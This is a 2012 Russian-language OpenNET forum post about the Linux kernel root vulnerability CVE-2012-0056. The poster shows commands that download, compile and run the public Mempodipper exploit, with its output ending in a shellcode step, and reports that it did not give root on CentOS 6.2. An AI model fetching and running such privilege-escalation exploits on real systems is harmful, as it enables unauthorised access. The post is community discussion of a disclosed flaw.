The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



""
Версия для распечатки Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Исходное сообщение [ Отслеживать ]
Заметили полезную информацию ? Пожалуйста добавьте в FAQ на WIKI.
. "В ядре Linux найдена локальная root-уязвимость" –5 +/
Сообщение от ALex_hha (ok), 23-Янв-12, 18:28 
$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
$ gcc -o mempodipper mempodipper.c
$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19890/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.

$ whoami
test

$ id
uid=500(test) gid=501(test) groups=501(test)

ЧЯДНТ?

$ cat /etc/redhat-release
CentOS release 6.2 (Final)

$ uname -r
2.6.32-220.2.1.el6.x86_64

Ответить | Правка | Наверх | Cообщить модератору

Оглавление
, opennews, 23-Янв-12, 16:00  [смотреть все]
Форумы | Темы | Пред. тема | След. тема



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру